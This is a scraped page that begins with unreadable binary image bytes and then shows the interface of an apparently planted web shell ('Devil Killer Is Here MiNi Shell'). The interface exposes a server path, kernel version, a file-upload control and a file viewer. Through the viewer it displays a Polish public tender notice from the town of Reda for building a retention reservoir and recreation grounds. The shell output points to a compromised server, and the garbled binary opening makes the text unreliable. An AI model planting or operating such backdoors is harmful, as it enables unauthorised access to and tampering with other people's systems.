JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240514/0032338301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa zbiornika retencyjnego i terenów rekreacyjnych przy istniejącym rowie odwadniającym pn. – wsch. części Redy. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIASTO REDA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191675161</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Gdańska 33</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Reda</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-240</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi3@reda.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.reda.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa zbiornika retencyjnego i terenów rekreacyjnych przy istniejącym rowie odwadniającym pn. – wsch. części Redy. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-aef73961-0ebd-11ef-9381-e6cc5d6d04e5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00323383</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00047100/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa zbiornika retencyjnego i terenów rekreacyjnych przy istniejącym rowie odwadniającym pn.-wsch. części Redy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/reda <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/reda</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z § 11 ust. 3 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu <br/>o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452), określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie, tj.:<br/>a)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b)	komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c)	zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10,<br/>d)	włączona obsługa JavaScript,<br/>e)	zainstalowany program Adobe Acrobat Reader, lub inny obsługujący format plików .pdf,<br/>f)	Platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g)	oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 r. (rozporządzenie Parlamentu Europejskiego i Rady UE 2016/679 w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE) Zamawiający informuje, że: Administratorem danych osobowych jest Burmistrz Miasta Redy z siedzibą w Redzie przy ul. Gdańskiej 33, 84-240 Reda, tel.: +48 (58) 738 80 23<br/>a)	administrator wyznaczył Inspektora Danych Osobowych Pana Krzysztofa Lubner, z którym można się kontaktować pod adresem e-mail: iod@ reda.pl . <br/>b)	Podanie danych osobowych jest warunkiem koniecznym do realizacji sprawy w Urzędzie Miasta Redzie. <br/>c)	Ogólną podstawę do przetwarzania danych stanowi art. 6 ust. 1 lit. b i c oraz art. 10 ogólnego rozporządzenia. <br/>d)	Szczegółowe cele przetwarzania danych zostały wskazane w następujących przepisach: <br/>e)	ustawie z dnia 11 września 2019 r. – Prawo zamówień publicznych; <br/>f)	ustawie z dnia 23 kwietnia 1964 r. – Kodeks cywilny; <br/>g)	ustawie z dnia 27 sierpnia 2009 r. o finansach publicznych; <br/>h)	ustawie z dnia 29 września 1994 r. o rachunkowości. <br/>i)	Pani/Pana dane będą przetwarzane w celu: <br/>- przeprowadzenia postępowania o udzielenie zamówienia publicznego i wyłonienie wykonawcy; <br/>- zawarcia umowy; <br/>- rozliczenia finansowo- księgowego. <br/>j)	Dane osobowe mogą być udostępniane innym podmiotom, uprawnionym do ich otrzymania na podstawie obowiązujących przepisów prawa, tj. na podstawie art. 18 i art. 74 Prawa zamówień publicznych a ponadto odbiorcom danych w rozumieniu przepisów o ochronie danych osobowych, tj. podmiotom świadczącym usługi pocztowe, kurierskie, usługi informatyczne, bankowe, ubezpieczeniowe, osobom i podmiotom zainteresowanym prowadzonym postępowaniem o udzielenie zamówienia publicznego, a także podmiotom korzystającym z Biuletynu Informacji Publicznej, Biuletynu Zamówień Publicznych, Bazy konkurencyjności oraz internetowej platformy zakupowej – eKatalogi, będącej w gestii Urzędu Zamówień Publicznych. Dane osobowe nie będą przekazywane do państw trzecich, na podstawie szczególnych regulacji prawnych, w tym umów międzynarodowych.<br/>k)	Dane osobowe będą przetwarzane, w tym przechowywane przez okres 4 lat, licząc od pierwszego stycznia roku następującego po roku, w którym sprawa została zakończona, a następnie, zgodnie z przepisami ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach, przez okres 5 lat, zgodnie kategorią B5, w przypadku dokumentacji postępowania oraz 10 lat w związku z zawartą umową, zgodnie z kategorią archiwalną B10, a w przypadku zmiany kategorii archiwalnej dokumentacji przez okres zgodny ze zmienioną kategorią archiwalną dokumentacji. W przypadku zamówień finansowanych ze środków funduszy europejskich lub innych środków niż pochodzące z budżetu Unii Europejskiej na podstawie odrębnych przepisów tym zakresie do 25 lat. <br/>2.	W związku z przetwarzaniem danych osobowych, na podstawie przepisów prawa, posiada Pani/Pan prawo do: <br/>- dostępu do treści swoich danych, na podstawie art. 15 ogólnego rozporządzenia; <br/>- sprostowania danych, na podstawie art.16 ogólnego rozporządzenia <br/>- ograniczenia przetwarzania, na podstawie art. 18 ogólnego rozporządzenia. <br/>a)	Ma Pani/Pan prawo wniesienia skargi do organu nadzorczego - Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, iż przetwarzanie danych osobowych narusza przepisy o ochronie danych osobowych. <br/>b)	Gdy podanie danych osobowych wynika z przepisów prawa, jest Pani/Pan zobowiązana(y) do ich podania. Konsekwencją niepodania danych osobowych będzie brak możliwości zawarcia umowy o udzielenie zamówienia publicznego. <br/>c)	Dane nie będą przetwarzane w sposób zautomatyzowany, w tym również w formie profilowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">10.ZF.TP.BN.RB.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie robót budowlanych w formule „zaprojektuj i wybuduj” w ramach zadania inwestycyjnego pn. „Budowa zbiornika retencyjnego i terenów rekreacyjnych przy istniejącym rowie odwadniającym pn.-wsch. część Redy ”.<br/>W ramach przedmiotu zamówienia Wykonawca zobowiązany jest do:<br/>1)	wykonania kompletnej dokumentacji projektowej wraz z wykonaniem robót budowlanych dla zadania pn.: „Budowa zbiornika retencyjnego i terenów rekreacyjnych przy istniejącym rowie odwadniającym pn.-wsch. część Redy.” – zwanych dalej zamówieniem podstawowym<br/>2)	wykonania kompletnej dokumentacji projektowej wraz z wykonaniem robót budowlanych dla rewitalizacji Rowu F, budowy drogi technicznej wzdłuż rowu F oraz przebudowy odcinka sieci kanalizacji deszczowej – zwanej dalej „Opcją”.<br/>Szczegółowy Opis przedmiotu zamówienia stanowi :<br/>1) dla zamówienia podstawowego – Załącznik nr 1a do SWZ<br/>2) dla „Opcji” – Załącznik nr 1b do SWZ<br/>3) Dokumentacja - Załacznik nr 1c do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45112723-9 - Roboty w zakresie kształtowania placów zabaw</p> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <p class="mb-0">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> „Opcja” została opisana w załączniku nr 1b do SWZ – OPZ oraz w projektowanych postanowieniach umowy – załączniku nr 5 do SWZ oraz dokumentacji – załącznik nr 1c do SWZ.<br/><br/><br/>1.	Zamawiający przewiduje możliwość skorzystania z prawa zlecenia, w zakresie prawa opcji, określonego w SWZ i za wynagrodzeniem wskazanym w ofercie wykonawcy, dodatkowego zakresu (część objęta prawem opcji) obejmującego wykonanie prac wskazanych w załączniku nr 2 do SWZ.<br/>2.	Warunkiem skorzystania z prawa opcji jest uzyskanie (zapewnienie) przez Zamawiającego prawa do dysponowania nieruchomością na cele budowlane. Po uzyskaniu w/w, Zamawiający jest uprawniony do złożenia oświadczenia woli o skorzystaniu z prawa opcji.<br/>3.	Skorzystanie z prawa opcji nie jest obowiązkowe. W przypadku nieskorzystania przez zamawiającego z prawa opcji, wykonawcy nie przysługuje żadne roszczenie z tego tytułu i otrzymuje on tylko wynagrodzenie za wykonane prace.<br/>4.	Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji w niepełnym zakresie.<br/>5.	Zamawiający ma prawo do skorzystania z prawa opcji przewidzianego w ust. 1 powyżej w terminie nie później niż do dnia odbioru częściowego zamówienia podstawowego – Etapu 1, o którym mowa w § 3 ust.2 pkt 1).<br/>6.	Warunkiem skorzystania z prawa opcji jest złożenie przez zamawiającego oświadczenia woli o skorzystaniu z prawa opcji i jego zakresie w terminie wskazanym w ust. 5 powyżej. Strony dopuszczają możliwość złożenia tego oświadczenia za pośrednictwem poczty elektronicznej na wskazany adres<br/>7.	W przypadku skorzystania przez zamawiającego z prawa opcji, wykonawca będzie realizował zakres opcjonalny w sposób określony w niniejszej umowie dla zakresu podstawowego, chyba że w umowie lub SWZ wskazano inaczej. Prac objętych prawem opcji – w przypadku skorzystania przez zamawiającego z tego prawa – dotyczą te same warunki i zobowiązania umowne wykonawcy (w tym zobowiązania z tytułu gwarancji i rękojmi, praw autorskich, zabezpieczenia, kar umownych, zmiany umowy w części dotyczącej prawa opcji itp.), co przedmiotu umowy objętego zakresem podstawowym zamówienia. <br/>8.	Maksymalną wartością opcji jest wynagrodzenie ryczałtowe wskazane w ofercie Wykonawcy za wykonanie opcjonalnego zakresu zamówienia. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">28 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przy wyborze najkorzystniejszej oferty będzie się kierował następującym kryteriami. <br/>1% wagi kryterium = 1 pkt. <br/>Cena (C) - waga kryterium 60 %<br/>Doświadczenie zawodowe Kierownika Budowy (DK) - waga kryterium 20 %<br/>Doświadczenie zawodowe Projektanta w Specjalności Architektonicznej (DA) - waga kryterium 20 %<br/>a)	Cena [C] 60 % = 60 pkt. <br/>Na kryterium „cena (C)” składają się:<br/>- podkryterium „cena zamówienia podstawowego” (waga 40%=40 pkt)<br/>- podkryterium „cena opcji” (waga 20%=20 pkt.)<br/>Do obliczenia łącznej liczby pkt. w kryterium „cena” zostanie zastosowany wzór : C=CP+CO, gdzie, <br/>C – liczba pkt. przyznanych w kryterium „cena”<br/>CP – liczba pkt. przyznanych „cena zamówienia podst.”<br/>CO – liczba punktów przyznanych „cena opcji”<br/>Sposób oceny ofert „cena zamówienia podstawowego” CP:<br/>Ceną braną pod uwagę do obliczenia punktacji w „cena zamówienia podstawowego” jest cena wskazana w pozycji 5.2 Formularza oferty.<br/>Liczba punktów otrzymanych wynikać będzie ze wzoru:<br/>CP = (CPmin / CPo) x 40<br/>gdzie:<br/>CP – liczba pkt. jakie otrzyma badana oferta w podkryterium „cena zamówienia podstawowego”<br/>CPmin – najniższa oferowana cena za zamówienie podstawowe<br/>CPo – cena za zamówienie podstawowe badanej oferty<br/><br/>Sposób oceny ofert w podkryterium „cena opcji” CO:<br/>Ceną braną pod uwagę do obliczenia punktacji w podkryterium „cena opcji” jest cena wskazana w pozycji 5.2 Formularza oferty.<br/>Liczba punktów otrzymanych w tym podkryterium wynikać będzie ze wzoru:<br/>CO = (COmin / COo) x 20<br/>gdzie:<br/>CO – liczba punktów jakie otrzyma badana oferta w podkryterium „cena opcji”<br/>COmin – najniższa oferowana cena za zamówienie z opcją <br/>COo – cena za zamówienie z opcją badanej oferty<br/><br/>b) Doświadczenie zawodowe Kierownika Budowy (DK) - waga kryterium 20 %<br/>Zamawiający przyzna punkty, jeśli Kierownik Budowy wskazany do wykonania zamówienia w formularzu ofertowym oraz na spełnienie warunków udziału w postępowaniu, który posiada uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno – budowlanej posiada ponad 5 lat doświadczenia zawodowego wymaganego na spełnienie warunków udziału w postępowaniu - w pełnieniu samodzielnej funkcji technicznej kierownika budowy licząc od daty ich uzyskania.<br/>Zamawiający za wskazanie dodatkowych lat w doświadczeniu w pełnieniu samodzielnej funkcji technicznej kierownika budowy przyzna pkt :<br/>Doświadczenie zawodowe Kierownika Budowy (DK) pkt.:<br/>1. 5 lat dośw. zawodowego - 0 pkt.<br/>2. 6 lat dośw. zawodowego - 10 pkt.<br/>3. 7 lat i więcej dośw. zawodowego - 20 pkt.<br/>Uwaga: <br/>Wykonawca w celu speł. warunków udziału w postęp. powinien wskazać tą samą osobę, którą wskazał w form. ofert. w celu wykazania pkt. w kryterium Doświadczenie zawodowym Kierownika Budowy (DK). <br/>c)	Doświadczenie zawodowe Projektanta w Specjalności Architektonicznej (DA) - waga kryterium 20 %<br/>Zamawiający przyzna pkt., jeśli projektant wskazany do wykonania zamówienia w form. ofert. oraz na speł. warunków udziału w postęp., posiada uprawnienia do projektowania bez ograniczeń w specjalności architektonicznej oraz posiada doświadczenie ponad wymagane na spełnienie warunku udziału w postępowaniu w projektowaniu zagospodarowania terenu wraz z zielenią o powierzchni nie mniejszej niż 1 ha;<br/>Zamawiający za wskazanie dodatkowego doświadczenia przyzna następującą punktację :<br/>Doświadczenie zawodowe Projektanta w Specjalności Architektonicznej (DA)Punkty: <br/>1. dośw. w projektowaniu 1 zagospodarowania terenu wraz z zielenią o powierzchni nie mniejszej niż 1 ha; - 0 pkt.<br/>2. dośw. w projektowaniu 2 zagospodarowań terenu wraz z zielenią o pow. nie mniejszej niż 1 ha; - 10 pkt.<br/>3. dośw. w projektowaniu 3 i więcej zagospodarowań terenu wraz z zielenią o powierzchni nie mniejszej niż 1 ha; - 20 pkt.<br/><br/>Uwaga: <br/>Wykonawca w celu spełnienia war. udziału w postęp. powinien wskazać taką samą osobę, którą wskazał w form. ofert. w celu wykazania pkt. w kryterium Dośw. zawod. Projektanta w Specjalności Architektonicznej (DA).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe Kierownika Budowy (DK)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe Projektanta w Specjalności Architektonicznej (DA)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału <br/>w postępowaniu dotyczące: <br/><br/>1)	Zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br/><br/>2)	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br/><br/>3)	Sytuacji ekonomicznej lub finansowej.<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br/><br/>4)	Zdolności technicznej lub zawodowej:<br/>a)	w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – wykonał co najmniej jedną robotę budowlaną o wartości co najmniej 3 000 000,00 złotych brutto, polegającą na tworzeniu lub rewitalizacji terenów zieleni wraz z budową otwartego zbiornika.<br/><br/>Po pojęciem „budowy” Zamawiający rozumieć wykonanie obiektu budowlanego w określonym miejscu<br/><br/>Przez pojęcie „tereny zieleni” Zamawiający rozumie tereny ogólnodostępne i zorganizowane pod 